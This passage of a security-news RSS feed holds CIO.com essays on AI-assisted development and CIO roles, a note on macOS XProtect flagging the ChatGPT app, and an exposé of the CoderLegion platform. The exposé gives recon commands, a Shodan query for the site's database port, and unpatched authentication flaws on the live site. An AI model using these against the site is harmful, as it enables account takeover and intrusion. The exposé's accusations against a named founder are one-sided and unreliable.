<p>For most of my technology career spanning more than two decades, software architecture was primarily seen as a technical discipline — concerned with system design, scalability and integration patterns. Architecture reviews happened after strategy decisions were made, and success was often measured by whether systems operated as per the functional requirements and performed reliably under load.</p>



<p>Architecture operated quietly in the background. It guided structure, while governance lived in policy documents and delivery followed predictable engineering processes.</p>



<p>That model is no longer sufficient. Software development is entering a phase that many enterprises did not fully anticipate. Today, the most important architectural questions are no longer technical alone. They are organizational, operational and increasingly regulatory. As AI becomes embedded across the software development lifecycle, architecture is evolving from system design practice into something far more consequential — the mechanism through which enterprises maintain control, trust and accountability in automated environments. This shift is more visible in regulated industries, where innovation must move quickly but failure is measured not only in downtime, but in regulatory exposure and loss of institutional trust.</p>



<p>From what I’m seeing across enterprise programs today, architecture matters more than ever because software development itself is fundamentally changing. I see a clear pattern emerging where software architecture matters more than ever because it has become the foundation of enterprise control and trust.</p>



<h2 class="wp-block-heading">The quiet transformation of the software development lifecycle</h2>



<p>Unlike past technology revolutions, the AI transformation of software development is not arriving through a single disruptive moment. It is unfolding quietly inside everyday workflows.</p>



<p>Engineers are spending less time writing software from scratch and more time supervising systems to generate, configure and evolve software automatically. Development has moved from construction toward orchestration with the adoption of AI assistants to generate code snippets. Testing frameworks are becoming more automated, and deployment pipelines are making optimization decisions independently.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="270" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Software development with AI-assisted tools.</figcaption></figure><p class="imageCredit">Aman Sardana</p></div>



<p>We are also beginning to see AI agents move beyond assisting developers toward replacing parts of the traditional Integrated Development Environment itself. Tools powered by large language models — such as <a href="https://venturebeat.com/orchestration/we-tested-anthropics-redesigned-claude-code-desktop-app-and-routines-heres-what-enterprises-should-know" rel="nofollow">Anthropic’s Claude</a> — are increasingly capable of reasoning across entire repositories, proposing architectural changes, executing multi-step development tasks and interacting directly with development workflows rather than functioning merely as coding autocomplete tools.</p>



<p>This evolution fundamentally alters the SDLC (Software Development Life Cycle). Development is no longer a sequence of controlled human decisions; it is becoming a collaboration between people, platforms and intelligent systems.</p>



<p>Many organizations still describe this evolution as productivity improvement. I believe that this framing misses the deeper implication where the real transformation is not speed — it is control.</p>



<p>This evolution aligns with the industry’s broader shift toward platform engineering and autonomous delivery models discussed in<a href="https://www.thoughtworks.com/en-us/insights/looking-glass/looking-glass-2026/AI-and-software-delivery" rel="nofollow"> Thoughtworks Insights</a>, which identifies AI-assisted development as a structural change in how software is produced rather than simply a productivity enhancement.</p>



<h2 class="wp-block-heading">AI-assisted development introduces a new operating model</h2>



<p>AI-assisted software development represents more than automation. In my opinion, it introduces a new operating model where development workflows themselves become intelligent systems. The SDLC transitions from linear execution to continuous adaptation. But autonomy without structure creates risk.</p>



<p>Architecture becomes the mechanism that ensures autonomy operates safely within enterprise intent. The question facing CIOs is no longer how fast we can deliver software. It is how do we trust systems that increasingly build themselves?</p>



<p>In regulated industries, this question carries profound implications. Autonomous development without architectural guardrails can introduce compliance gaps, security risks and operational instability at machine speed.</p>



<h2 class="wp-block-heading">The leadership challenge: Trust over velocity</h2>



<p>For years, technology leadership focused on accelerating delivery. Agile, DevOps and cloud adoption are all optimized for speed. AI makes all three easier to achieve.</p>



<p>When development accelerates faster than governance processes, organizations face a dangerous gap. Software may reach production before enterprises fully understand how it behaves, how decisions were derived or whether architectural standards were followed. I believe that the issue is not that AI produces poor software. The real issue is that enterprise oversight mechanisms were never designed for autonomous development velocity.</p>



<p>The importance of trust in technology systems is now reflected across global initiatives focused on responsible digital transformation. Collaborative efforts such as the<a href="https://www.globalchallenge.ai/" rel="nofollow"> Global Trust Challenge</a> highlight the growing recognition that AI innovation must be paired with measurable trust frameworks spanning governance, ethics, security and accountability.</p>



<p>With AI-Assisted software development, I am increasingly seeing that the leadership challenge is no longer delivery velocity — it is to gain trust over what is being delivered. There are various aspects of software development that I see are increasingly becoming a concern for senior leadership, especially in the regulated industry.</p>



<ul class="wp-block-list">
<li>Protection of sensitive data</li>



<li>Continuous compliance assurance</li>



<li>Explainability of automated decisions</li>



<li>Operational resilience amid autonomous change</li>



<li>Clear accountability when AI-generated systems fail</li>
</ul>



<p>In regulated industries, trust is inseparable from technology operations. Regulatory compliance, data protection, operational resilience and auditability cannot be retrofitted after software is created. AI compresses development timelines so dramatically that traditional governance checkpoints become ineffective. Manual reviews cannot scale to match machine-generated output.</p>



<p> The central question for technology leaders is shifting from “How fast can we deliver?” to “Can we trust what is being delivered?”</p>



<h2 class="wp-block-heading">Architecture as the enterprise control system</h2>



<p>Historically,<a href="https://vfunction.com/blog/what-is-software-architecture/" rel="nofollow"> architecture functioned as a blueprint</a> — describing how systems should be built. In AI-driven software development, architecture is evolving from providing blueprints to being the control system. I am increasingly seeing that the role of architecture is shifting to define what AI systems can access, how decisions are validated and how risk is constrained before problems emerge.</p>



<p>Instead of reviewing every implementation, architecture establishes boundaries within which innovation can safely occur. Rather than slowing innovation, architectural governance enables safe autonomy. Developers and AI systems can move faster precisely because constraints are already designed into the environment.</p>



<p>This shift marks the emergence of what I see as the architecture-led enterprise — organizations where architecture aligns innovation, risk management and strategy simultaneously.</p>



<h2 class="wp-block-heading">Trust will become the real competitive advantage</h2>



<p>Over the next decade, AI will make software creation cheaper, faster and more accessible than ever before. Feature velocity will no longer differentiate organizations. It will be how organizations maintain trust. Customers, regulators and partners will favor enterprises that can demonstrate:</p>



<ul class="wp-block-list">
<li>Predictable system behavior</li>



<li>Transparent decision processes</li>



<li>Secure handling of data</li>



<li>Operational resilience</li>



<li>Responsible AI adoption</li>
</ul>



<p>One of the most significant changes I observe is that architects are no longer designing only systems — they are designing decision environments.</p>



<p>In AI-assisted development, architects increasingly define:</p>



<ul class="wp-block-list">
<li>Approved architectural patterns that guide AI-generated solutions</li>



<li>Platform constraints that prevent unsafe implementations</li>



<li>Reference models that embed regulatory expectations</li>



<li>Engineering workflows that enforce organizational standards automatically</li>
</ul>



<p>In my view, the goal shouldn’t be to limit developers from using AI tools. The goal should be to ensure that, regardless of who — or what — produces the software, outcomes remain aligned with enterprise intent.</p>



<p>Architecture becomes the invisible structure shaping thousands of development decisions every day.</p>



<h2 class="wp-block-heading">The changing role of the CIO and chief architect</h2>



<p>AI is redefining technology leadership itself.</p>



<p>Historically, CIOs and chief architects focused on modernization initiatives, platform adoption and delivery performance. AI has been redefining technology leadership. Today, leadership conversations increasingly revolve around institutional trust.</p>



<p>Executives are increasingly asking:</p>



<ul class="wp-block-list">
<li>Can we trust AI-generated code operating in production?</li>



<li>Do we understand how automated decisions impact customers?</li>



<li>Are we scaling innovation faster than our ability to govern it?</li>



<li>Is accountability preserved when development becomes partially autonomous?</li>
</ul>



<p>These questions elevate architecture into strategic leadership territory. The modern CIO is not merely overseeing technology delivery but stewarding an ecosystem of intelligent systems. Architects, in turn, are evolving from project advisors into organizational designers who shape how technology decisions happen across the enterprise.</p>



<p>Architecture is becoming the connective tissue linking innovation, risk management and business strategy. Enterprises with mature architecture practices are discovering they can adopt AI faster because foundational decisions — security, resilience, integration and governance are already institutionalized. Organizations lacking architectural discipline often slow down despite advanced tooling, constrained by uncertainty, risk concerns or operational fragility.</p>



<p>What differentiates organizations now is how safely they can scale innovation.</p>



<h2 class="wp-block-heading">Final thoughts</h2>



<p>The competitive advantage in AI-driven development is shifting away from feature velocity toward architectural maturity.</p>



<p>Humans, machines and automated processes are all contributing to software delivery. Architecture ensures they operate within shared principles. AI may accelerate how software is built, but architecture determines whether that software can be trusted at scale.</p>



<p>Much of the industry conversation around AI focuses on models, tools and productivity gains. Those elements matter, but they are not the defining challenge for enterprise leaders. The real challenge is governance and trust.</p>



<p>I believe that the organizations that succeed in AI-assisted development will not simply adopt better models or faster tools. They will rethink architecture as a strategic leadership function one that aligns technology execution with enterprise governance, risk management and long-term strategy.</p>



<p>For CIOs navigating AI-driven transformation, architecture is no longer optional. It is what makes innovation sustainable.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[If your Mac is saying the ChatGPT app is malware, here's how to fix it]]></title>
<description><![CDATA[There have been some incidents involving a Mac telling a user that the ChatGPT app is malware and moving it to the trash. Overall, ChatGPT isn't malware, and there's a very easy fix.It's too late to just update ChatGPT, you now have to re-download it from the developerThis is not Apple making a j...]]></description>
<link>https://tsecurity.de/de/3510963/ios-mac-os/if-your-mac-is-saying-the-chatgpt-app-is-malware-heres-how-to-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3510963/ios-mac-os/if-your-mac-is-saying-the-chatgpt-app-is-malware-heres-how-to-fix-it/</guid>
<pubDate>Tue, 12 May 2026 17:55:06 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[There have been some incidents involving a <a href="https://appleinsider.com/inside/mac" title="Mac" data-kpt="1">Mac</a> telling a user that the ChatGPT app is malware and moving it to the trash. Overall, ChatGPT isn't malware, and there's a very easy fix.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67621-142479-000-lead-ChatGPT-xl.jpg" alt="Mac desktop menu bar showing ChatGPT app menu open, with options like About, Settings, and a highlighted Check for updates item, plus standard File, Edit, View, Chats, Window, Help menus."><br><span>It's too late to just update ChatGPT, you now have to re-download it from the developer</span></div><br>This is not Apple making a judgement on the value of the ChatGPT app on the Mac, it's <a href="https://appleinsider.com/inside/macos" title="macOS" data-kpt="1">macOS</a> doing its job. <a href="https://appleinsider.com/articles/22/08/31/apple-xprotect-is-now-proactive-with-periodic-malware-scans">Since 2022</a>, macOS has included Xprotect, a feature you never usually need to know about, but which safeguards the Mac against malware.<br><br>In this case, as reported by users worldwide <a href="https://www.reddit.com/r/MacOS/comments/1tb2hcu/malware_in_chatgpt/">on social media</a>, Xprotect had concluded that the ChatGPT app contained malware. Therefore the whole app is suspect, therefore macOS moves it to the Trash and won't launch it.<br><br><br> <a href="https://appleinsider.com/articles/26/05/12/if-your-mac-is-saying-the-chatgpt-app-is-malware-heres-how-to-fix-it?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244320?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI saddles CIOs with new make-or-break expectations]]></title>
<description><![CDATA[CIOs and other IT leaders are experiencing a make-or-break moment as they face major new expectations in their roles, including the ability to lead change and build AI-ready teams.



IT leadership experts have been talking for years about the need for CIOs to focus on business results, in additi...]]></description>
<link>https://tsecurity.de/de/3509820/it-nachrichten/ai-saddles-cios-with-new-make-or-break-expectations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3509820/it-nachrichten/ai-saddles-cios-with-new-make-or-break-expectations/</guid>
<pubDate>Tue, 12 May 2026 12:17:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>CIOs and other IT leaders are experiencing a make-or-break moment as they face major new expectations in their roles, including the ability to <a href="https://www.cio.com/article/3974090/state-of-the-cio-2025-cios-set-the-ai-agenda.html">lead change and build AI-ready teams</a>.</p>



<p>IT leadership experts have been talking for years about the need for CIOs to focus on business results, in addition to providing technical expertise and keeping IT systems running. Those expectations remain, with 79% of IT leaders surveyed by Deloitte listing driving business outcomes as their top priority, a change from back-office upkeep to creating enterprise value.</p>



<p>But the 2026 <a href="https://www.deloitte.com/us/en/programs/chief-information-officer/articles/global-technology-leadership-study.html" rel="nofollow">Global Leadership Technology Study</a> from Deloitte, based on surveys of more than 660 senior IT executives, finds new and expanding expectations for CIOs and other IT leaders, including AI and data fluency, change leadership capabilities, and the ability to build AI teams.</p>



<p>To fulfill those growing expectations, IT leaders also face significant headwinds. While 81% of those surveyed say they’re confident in their organization’s ability to deploy and govern AI, 75% also believe their <a href="https://www.cio.com/article/4166168/cios-rethink-its-operating-model-to-deliver-better-business-outcomes.html">operating models and processes must change</a> within the next 12 to 18 months to drive greater value.</p>



<p>The numbers suggest that CIO ambitions for AI are outpacing capabilities, while they will increasingly be judged on their ability to drive <a href="https://www.cio.com/article/4154214/the-cios-new-job-description-chief-transformation-officer.html?utm=hybrid_search">business transformation</a> and successful AI initiatives, says <a href="https://www.deloitte.com/us/en/about/people/profiles.anjalishaikh+80ed8985.html" rel="nofollow">Anjali Shaikh</a>, managing director of Deloitte Consulting and leader of the Deloitte global CIO and US tech executive programs.</p>



<p>“AI is such a CEO- and board-strategic priority,” she says. “They’re looking at the CIO to really help think about everything across the board, from process to talent implications, operating models, and governance risk.”</p>



<h2 class="wp-block-heading">Shortage of AI experts</h2>



<p><a href="https://www.cio.com/article/4040008/heres-how-top-cios-build-highly-effective-ai-teams.html">Building expert AI teams</a> may be one of the most difficult expectations to meet. About a quarter of IT leaders in Deloitte’s survey named a shortage of skilled talent as a top challenge, just behind data quality and security and privacy concerns. Shaikh was surprised that the percentage of IT leaders concerned about a skills gap was as low as it was. For CIO.com’s <a href="https://us.resources.cio.com/resources/state-of-the-cio/" rel="nofollow">2026 State of the CIO survey</a>, 40% of IT leaders <a href="https://www.cio.com/article/4165232/whats-holding-back-enterprise-ai-shortage-of-talent-cios-say.html">identified a lack of in-house talent</a> as their top challenge in implementing AI strategies during the past year.</p>



<p>Shaikh advises CIOs to look for AI expertise everywhere they can, whether it’s hiring new employees with AI experience, <a href="https://www.cio.com/article/4117091/how-ai-upskilling-fails-and-what-it-leaders-are-doing-to-get-it-right.html">retraining current employees to build AI skills</a>, or partnering with vendors and other providers to bring in outside experts. CIOs should also strengthen relationships with their organizations’ chief HR officers to fill AI needs, she recommends.</p>



<p>IT leaders are now expected to both build AI-ready teams and lead their organizations through the changes needed to embrace AI, Shaikh notes.</p>



<p>“The limiting factor increasingly isn’t whether people are using the technology, it’s shifting from hiring AI specialists to building AI-ready organizations, and I am seeing more and more CIOs get moved into the conversation,” she says. “How are you going to uplevel the organization’s AI fluency?”</p>



<p>Technical expertise is not enough to be a technology leader today, Shaikh says.</p>



<p>“What separates leading organizations and leading CIOs is, can you put a team together that can understand how to redesign work, how to rethink decision-making, and understand what a digital workforce and human workforce looks like together?” she adds.</p>



<h2 class="wp-block-heading">Evolution always</h2>



<p>The CIO’s role is one of constant evolution, adds <a href="https://www.linkedin.com/in/%EF%BB%BFmatt%EF%BB%BF%EF%BB%BF-ausman%EF%BB%BF%EF%BB%BF-63b15213/" rel="nofollow">Matt Ausman</a>, CIO at scanning technology provider Zebra Technologies.</p>



<p>“One thing I’ve realized is a CIO today cannot simply be a technologist,” he says. “We must be a pathfinder, tracing a new path in an uncharted field, guided by experience from past technology shifts like the internet and the cloud. We must also be an evangelist and a C-suite advocate, championing the vision and securing the buy-in necessary for true transformation.”</p>



<p>Ausman’s approach is to focus on a few key priorities: centralizing governance, federating innovation, and measuring value. In addition, CIOs must be collaborators who bring together teams from HR, marketing, sales, engineering, and other business units, he says.</p>



<p>“The outcomes expected from CIOs cannot be created from IT alone,” he says. “Value creation requires people, process, and technology. The people and process transformation largely comes from within the teams of other C-suite leaders.”</p>



<p>At the same time, the CIO and IT organization need an equal seat at the table to help push broader teams through organizational transformations, he says. “That’s a shift that has been occurring for a few years but has been amplified with the focus on AI,” Ausman adds.</p>



<p>The new expectations for CIOs noted in the Deloitte report feel more fundamental than a few expanded responsibilities, says <a href="https://www.linkedin.com/in/avelange/" rel="nofollow">Jean-Philippe Avelange</a>, CIO at managed networking and cloud provider Expereo.</p>



<p>In the past, CIOs were measured on systems delivered and IT uptime, but they’re now evaluated on how technology enables businesses to make different decisions, he says.</p>



<p>“What is changing is the unit of measure,” he says. “That repositions the role from running systems to shaping decisions, from cost center to capability builder. From where I sit, that direction is real, and it is happening regardless of how comfortable any one of us is with it.”</p>



<p>Building capable teams will be one of the hardest mandates for CIOs facing new expectations, and the issue goes beyond a training problem, he adds.</p>



<p>“It is keeping psychological safety intact while the pressure to deploy AI everywhere collides with a very legitimate fear of being replaced,” Avelange says. “Top-down adoption targets like ‘100% of engineers using AI by Q3’ tend to produce compliance gaming more than real outcomes.”</p>



<p>CIOs should focus more on augmenting jobs with AI instead of replacing employees with it, he recommends. IT leaders can improve AI outcomes by giving teams time to experiment, not just access to tools, and measuring velocity, quality, and decision speed instead of use rates, he adds.</p>



<p>“When this is done well, organizations often hire faster because each engineer becomes more valuable,” he says. “When it is not, adoption theater and a quietly cynical team are the more likely outcome.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[They Charged $10/Month for a $5 Server, a Free Script, and Three Years of Lies. Here’s the Proof.]]></title>
<description><![CDATA[This is not a review. This is a documented technical record. Every claim in this article is reproducible by anyone with an internet connection. The commands are included. Run them yourself.How This StartedI joined CoderLegion as a content creator and reached #2 on the monthly leaderboard within d...]]></description>
<link>https://tsecurity.de/de/3505273/hacking/they-charged-10month-for-a-5-server-a-free-script-and-three-years-of-lies-heres-the-proof/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3505273/hacking/they-charged-10month-for-a-5-server-a-free-script-and-three-years-of-lies-heres-the-proof/</guid>
<pubDate>Sun, 10 May 2026 22:07:37 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*53lKoYF3djjyMjFxSeJOxw.png"></figure><blockquote><strong><em>This is not a review. This is a documented technical record.</em></strong><em> Every claim in this article is reproducible by anyone with an internet connection. The commands are included. Run them yourself.</em></blockquote><h3>How This Started</h3><p>I joined CoderLegion as a content creator and reached #2 on the monthly leaderboard within days — not because I’m exceptional, but because barely anyone posts.</p><p>Then the founder, Mehadi Hasan, sent me this:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WmnlRCwBuB5yi-ujM-g8rA.png"></figure><p><em>“I’d love to give you Premium free for a month and get your feedback on whether it actually helps. No pressure at all.”</em></p><p>Before accepting any offer involving payment details or long-term content investment, I look at what a platform is actually built on.</p><p>What I found is below. Every line is publicly verifiable.</p><h3>Finding 1: The Founding Date Is Fiction</h3><p>Run this in any terminal:</p><pre>$ curl -s https://coderlegion.com | grep -C 2 "dateCreated"</pre><pre>"dateCreated": "2020",<br>"publisher": "Coder Legion"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*55oVC8L4SUYR6a0vEWUIXQ.png"></figure><p>That markup is baked into every single page on the platform. It tells search engines — and every visitor — that this operation has existed since 2020.</p><p>Now run this:</p><pre>$ whois coderlegion.com | grep -E "Creation Date|Registry Expiry Date|Domain Status" | sort -u</pre><pre>Creation Date: 2023-07-21T16:50:42Z</pre><p><strong>The domain was not registered until July 21, 2023.</strong></p><p>The predecessor domain — kodlogs.net, the platform they rebranded from — only goes back to May 2021. That is the <em>earliest</em> any version of this operation can be placed in public record. Two years short of what they claim. And the current domain adds another two years on top of that.</p><p>There is no archived platform. No prior domain. No public evidence of existence before 2021.</p><p><strong>Three years of claimed history. Zero evidence. Embedded in every page.</strong></p><h3>Finding 2: They Said No Ads. The Source Code Disagrees.</h3><p>From their About page, verbatim:</p><blockquote>“The platform is completely free to use. We don’t run ads or charge authors.”</blockquote><p>Press Ctrl+U on any CoderLegion page. Search for adsbygoogle. You'll find an active Google AdSense implementation with publisher ID ca-pub-1763140298030248.</p><p>Ads appear in the sidebar. At the bottom of posts. On the homepage.</p><p>And on the <strong>Delete Profile page</strong> — while you are in the process of permanently erasing your account:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Kqa-qL04zO9UPjWxoQABAA.png"></figure><p><em>“We don’t run ads.” — The About page. This is the Delete Profile page.</em></p><p>During the investigation, a second ad network also appeared on mobile — MetroOpinion, a third-party survey platform:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/462/1*PHa9dMrH5FL22bExi-DPYw.png"></figure><p><em>Two ad networks. On a platform that explicitly claims to run no ads.</em></p><p><strong>The About page is marketing copy. The source code is the ground truth. They do not match.</strong></p><h3>Finding 3: The User Count Is Not Accurate — And It’s Not Even Consistent</h3><p>Every visitor to CoderLegion sees this in the login modal:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KJ5PxoikTOY51z-k-bDB5A.png"></figure><p>That number was <strong>4,065</strong> during an earlier analysis session. It’s now <strong>4,081</strong>. The number is not pulled from the database in real-time — it changes manually, which means someone is editing it by hand.</p><p>Here is what the database actually says. The users page has public pagination. Pagination has math:</p><pre>URL pattern:          /users?start={offset}<br>Items per page:       30<br>Last accessible offset: 1170</pre><pre>Calculation:<br>  1170 / 30 = 39 full pages<br>  + final page = ~40 pages total<br>  40 × 30 = ~1,200 real users</pre><p><strong>The modal claims 4,081. The database supports ~1,200.</strong></p><p>That is a 70% inflation in the number shown to every prospective user at the exact moment they decide whether to sign up. And the fact that the number changes between sessions — going from 4,065 to 4,081 — confirms it is being managed manually, not calculated.</p><h3>Finding 4: The Infrastructure Behind the $10/Month Plan</h3><pre>$ curl -I https://coderlegion.com | grep -i server<br>server: LiteSpeed</pre><p>LiteSpeed shared hosting. Market rate: <strong>$3–5/month.</strong></p><p>Open the page source (Ctrl+U). Search for qa-theme:</p><pre>/qa-theme/CoderLegion/<br>/qa-plugin/q2a-badges-master/<br>/qa-content/jquery-3.3.1.min.js</pre><pre>Session cookies:<br>  qa_key     ← Question2Answer token<br>  PHPSESSID  ← PHP backend</pre><p>This platform runs on <strong>Question2Answer</strong> — a free, open-source PHP script. Zero license cost. Publicly available at question2answer.org.</p><p>This is what they are charging you $10/month for:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*91MSvDluenQavqxRCccrQw.png"></figure><p><em>“Supercharge Your Developer Journey.” Free Q2A script. $5 shared hosting. ~37 active writers per month.</em></p><p>“10x More Visibility” among 37 people. On a free script. On a $5 server.</p><h3>Finding 5: GoDaddy Has Blocked Renewal on Both Domains</h3><p>The WHOIS output from the terminal screenshot above tells the full story:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/965/1*nvJm0qPdQlwAKRFSww6XoQ.png"></figure><pre>$ whois coderlegion.com</pre><pre>Domain Status: clientRenewProhibited ⚠<br>Registry Expiry Date: 2026-07-21</pre><pre>$ whois kodlogs.net</pre><pre>Domain Status: clientRenewProhibited ⚠<br>Registry Expiry Date: 2026-05-08</pre><p>clientRenewProhibited is not a default flag. A registrar applies it when the domain owner is blocked from renewing — typically due to outstanding billing disputes, account holds, or compliance violations.</p><p><strong>Both the current domain and the predecessor domain carry this flag.</strong></p><p>kodlogs.net has already expired as of the date of this writing. coderlegion.com expires July 21, 2026.</p><p>One additional data point: the WHOIS record for coderlegion.com was updated <strong>April 14, 2026</strong> — days after a technical analysis of this platform was published publicly. WHOIS records do not update themselves.</p><p><strong>If you have content on CoderLegion, export it today. Not next week. Today.</strong></p><h3>Finding 6: The Database Is Observable from the Public Internet</h3><p>This is a passive observation, not an exploit. Standard security practice requires database services (MariaDB/MySQL, port 3306) to be bound to localhost — invisible to the outside world.</p><pre>Expected:   127.0.0.1:3306  ← accessible to local services only<br>Observed:   0.0.0.0:3306    ← observable from public internet</pre><p>A payment-collecting platform with a publicly observable database port is the kind of configuration that ends with breach notification emails. Verifiable via Shodan or standard port scanning. No credentials required.</p><p><strong>If you have entered payment information on CoderLegion, you should be aware of this.</strong></p><h3>Finding 7: The Authentication Controls Are Broken</h3><p>Observed during normal use of my own account:</p><p><strong>Password reset:</strong> The forgot-password flow accepts a new password directly without sending a verification link to the registered email. Ownership of the account is never confirmed.</p><p><strong>Account deletion:</strong> The deletion confirmation field — marked “Please enter your password” — accepts any non-empty string. It does not validate against the account’s actual password. An account can be deleted by anyone who can reach the page.</p><p>Both are basic authentication failures. Both were found in under five minutes of normal account usage.</p><h3>Finding 8: There Is No Peter Jones</h3><p>Before this investigation, I received the following:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ECZzbjZfEDuWHo-QxGT1_g.png"></figure><pre>From:    Peter Jones &lt;peter.jones@legioncoder.com&gt;<br>To:      [my email]</pre><pre>Hi Rockman,</pre><pre>Your recent post "You Don't Need Chaos Monkey" on Hashnode really<br>caught my attention...</pre><p>My name is FreeRave. Not Rockman. The {{first_name}} merge variable pulled a different contact's data from the bulk list. The email was sent anyway.</p><p>Independent reports confirm the same template was sent from different sender names — “Peter Jones,” “Ross,” and others — all from @legioncoder.com addresses, all referencing a specific Hashnode post, all word-for-word identical.</p><p>The sender domain — legioncoder.com, not coderlegion.com — is a standard cold-email infrastructure pattern: use a separate sending domain to protect the primary domain's deliverability reputation.</p><p>There is no editorial team. There is no personal curation. There is a template, a mailing list, and occasionally the wrong name in the salutation.</p><h3>The Sequence After Publication</h3><p>Following a prior technical analysis going public, this happened:</p><p><strong>Step 1 — IP block:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_0vmscLHwGM8NcKZdHvM9w.png"></figure><p>Desktop access timed out. Mobile network access (different IP range) remained fully operational — confirming a targeted IP-level block, not server failure or maintenance. Ads continued serving on mobile while desktop was blocked.</p><p><strong>Step 2 — Newsletter delivered to deleted account:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*mzvdDC5ga1-v5HCN-DXZrg.png"></figure><pre>From:    Peter Jones &lt;newsletter@coderlegion.com&gt;<br>Subject: This Week at CoderLegion: New Articles, Your Analytics &amp; More!</pre><pre>Hi FreeRave,<br>Your profile is ready to grow!</pre><pre>Account status:    Deleted ✅<br>IP status:         Blocked ✅<br>Newsletter status: Delivered ✅</pre><p>Continuing to send marketing email to a deleted account’s address is not a UX bug. Under GDPR Article 17, account deletion triggers a right to erasure that extends to all processing — including marketing lists.</p><p>The response to published technical findings was not a statement, a correction, or engagement. It was a network-level IP block on the reviewer’s machine.</p><h3>Reproduce Everything Yourself</h3><pre># Domain creation date and renewal status<br>$ whois coderlegion.com<br>$ whois kodlogs.net</pre><pre># Server software<br>$ curl -I <a href="https://coderlegion.com/">https://coderlegion.com</a> | grep -i server</pre><pre># Founding date embedded in source<br>$ curl -s <a href="https://coderlegion.com/">https://coderlegion.com</a> | grep -C 2 "dateCreated"</pre><pre># Platform identification (or just press Ctrl+U in browser)<br># Search for: qa-theme, adsbygoogle, dateCreated</pre><pre># User count math<br># Navigate to /users — find last page number — multiply by 30</pre><pre># AdSense publisher ID<br># Ctrl+U → search: pub-</pre><pre># DB exposure<br># Shodan: hostname:coderlegion.com port:3306</pre><p><strong>15 minutes. A browser. Every finding above independently reproducible.</strong></p><h3>Who This Is For</h3><p><strong>Developers considering joining:</strong> The information above existed before you arrived. Now you have it.</p><p><strong>Content creators with published posts:</strong> Your content lives on a domain expiring July 21, 2026, with renewal blocked. Export everything now.</p><p><strong>Premium subscribers:</strong> You paid $10/month for boosted visibility among ~37 active writers per month, on a free open-source script, on shared hosting, on a platform that misrepresented its founding date, user count, and monetization model. If you believe the service was misrepresented at point of purchase, your card provider has a formal dispute process.</p><p><strong>Security researchers:</strong> Port 3306 publicly observable on a payment-collecting service is reportable to the relevant consumer protection authority in the operator’s jurisdiction.</p><h3>Conclusion</h3><p>One person building a developer community from scratch is hard. That deserves acknowledgment.</p><p>None of it justifies:</p><p>A founding date embedded in every page that no public domain record supports.<br> An ad-free promise directly contradicted by AdSense source code.<br> A user count inflated by ~70% — and manually edited between sessions.<br> A $10/month plan built on a free script and a $5 shared server.<br> Two domains blocked from renewal by their registrar.<br> A database port observable from the public internet on a payment-collecting platform.<br> Bulk outreach disguised as individual editorial curation — with mail merge errors left in.<br> An IP block as the response to published technical findings.<br> Marketing email delivered to deleted accounts in violation of erasure rights.</p><p><strong>Developers deserve accurate information about platforms asking for their time, content, and money.</strong></p><p>Run the commands. Verify the findings. Make your own decision.</p><p><em>All findings derived exclusively from public record: WHOIS lookups, HTTP headers, HTML source code, URL parameter enumeration, and first-party account use. No credentials other than the author’s own account were used. No unauthorized access was performed or implied at any stage.</em></p><p><strong>Have you received a “Peter Jones” email?</strong> What name appeared in your salutation field? Leave a comment — every data point helps establish the scope of the campaign.</p><p><em>Related:</em><br><a href="https://medium.com/bugbountywriteup/part-2-i-published-a-scam-expose-bc420e0bbc00"> <strong>PART 2: I Published a Scam Expose. NetEase Sent a Takedown Request. Then They Rewrote Their Entire Operation.</strong></a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=b232637e4269" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/they-charged-10-month-for-a-5-server-a-free-script-and-three-years-of-lies-heres-the-proof-b232637e4269">They Charged $10/Month for a $5 Server, a Free Script, and Three Years of Lies. Here’s the Proof.</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[5,000 vibe-coded apps just proved shadow AI is the new S3 bucket crisis]]></title>
<description><![CDATA[Most enterprise security programs were built to protect servers, endpoints, and cloud accounts. None of them was built to find a customer intake form that a product manager vibe coded on Lovable over a weekend, connected to a live Supabase database, and deployed on a public URL indexed by Google....]]></description>
<link>https://tsecurity.de/de/3501271/it-nachrichten/5000-vibe-coded-apps-just-proved-shadow-ai-is-the-new-s3-bucket-crisis/</link>
